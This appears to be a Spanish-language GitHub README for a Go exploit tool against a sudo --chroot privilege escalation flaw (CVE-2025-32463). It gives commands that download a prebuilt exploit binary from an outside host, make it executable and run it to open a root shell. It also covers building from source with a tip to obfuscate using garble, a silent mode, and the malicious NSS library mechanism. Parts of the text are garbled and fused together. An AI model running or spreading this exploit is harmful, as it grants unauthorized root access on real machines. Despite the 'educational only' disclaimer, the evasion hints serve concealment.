
Este CVE aborda una vulnerabilidad en las versiones de sudo 1.9.14 a 1.9.17, permitiendo una escalada de privilegios local no autorizada al acceso root.
Este repositorio proporciona una herramienta de exploit basada en Go para CVE-2025-32463, una vulnerabilidad crítica de escalada local de privilegios (CVSS 9.3) en sudo versiones 1.9.14 a 1.9.17. Permite a usuarios locales no autorizados obtener acceso root explotando una falla en la opción --chroot (-R).
⚠️ Advertencia: Solo para fines educativos y de prueba. Úsalo en entornos aislados (p. ej., VMs). No para uso malintencionado.
--chrootcurl -L https://github.com/Nowafen/CVE-2025-32463/releases/download/exploit/exploit -o exploit
chmod +x exploit
./exploit --execution # Launches root shell
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
go build -o exploit # Or use garble for obfuscation
./exploit --execution
| Comando | Descripción |
|---|---|
./exploit --help | Mostrar ayuda de uso |
./exploit --about | Mostrar detalles de CVE |
Verificación: En el shell root, ejecuta id (debe mostrar uid=0(root)) o whoami (debe mostrar root).
/tmp/sudowoot.stage.*woot1337.c) para el shell rootlibnss_/woot1337.so.2)sudo -R woot woot para cargar la biblioteca y escalar privilegiosDefaults !use_chroot a /etc/sudoersEsta herramienta es para investigación de seguridad. El autor no es responsable del mal uso. Prueba siempre de forma responsable.
Creado por MNM
./exploit --execution | Ejecutar exploit (abre shell root) |
./exploit --execution --silent | Ejecución en modo silencioso |